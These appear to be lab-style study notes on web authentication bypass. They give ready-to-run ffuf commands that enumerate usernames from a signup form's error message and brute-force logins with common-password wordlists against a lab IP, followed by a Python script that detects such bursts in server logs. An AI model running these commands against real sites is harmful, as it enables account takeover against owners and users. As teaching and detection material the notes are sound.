Authentication Bypass

Username enumeration

  • Look for signup or registration forms and try submitting a common username.

  • If the form responds with an error such as 'account already in use' or 'username already exists', the application is confirming which usernames are taken.

  • ffuf can then be used to repeat this check against a username wordlist and build a list of valid usernames. The -mr flag keeps only responses whose body matches the given regex (the "username already exists" error):

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.43.85/customers/signup -mr "username already exists"

Brute force

  • Once you have a list of potential/valid usernames, you can attempt to brute force the login. Two wordlists are fuzzed together (W1 for usernames, W2 for passwords), and -fc 200 filters out responses with status 200 (the failed-login page), so only the responses that differ, i.e. successful logins, are shown:

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.43.85/customers/login -fc 200
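As an added defensive illustration (not part of the original notes): both ffuf runs above produce a burst of POST requests to /customers/signup or /customers/login from a single source. The script below assumes combined-format web server logs, uses constructed sample lines with made-up IPs and timestamps, and flags any source that sends more than a threshold of POSTs to either endpoint within a sliding window, which is the simplest signal to alert on or rate-limit.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Endpoints from the notes above that enumeration and brute force hit.
WATCHED = {"/customers/signup", "/customers/login"}


def parse_line(line):
    """Return a dict for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m["ip"], "ts": ts, "method": m["method"],
            "path": m["path"], "status": int(m["status"])}


def find_bursts(lines, threshold=20, window=timedelta(seconds=60)):
    """Map (ip, path) -> peak count for sources that send at least `threshold`
    POSTs to a watched endpoint inside any window of length `window`."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] in WATCHED:
            events[(rec["ip"], rec["path"])].append(rec["ts"])
    alerts = {}
    for key, stamps in events.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):  # sliding window over sorted timestamps
            while stamps[end] - stamps[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[key] = max(alerts.get(key, 0), count)
    return alerts


def _line(ip, path, status, second):
    # Constructed sample line; IP, date and sizes are made up for this example.
    return (f'{ip} - - [10/Mar/2024:12:00:{second:02d} +0000] '
            f'"POST {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"')


# Constructed sample: one source hammers the signup form, another logs in once.
SAMPLE_LOG = [_line("10.0.0.5", "/customers/signup", 200, s) for s in range(40)]
SAMPLE_LOG.append(_line("10.0.0.9", "/customers/login", 302, 5))

if __name__ == "__main__":
    for (ip, path), n in find_bursts(SAMPLE_LOG).items():
        print(f"ALERT {ip} sent {n} POSTs to {path} within 60s")
```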
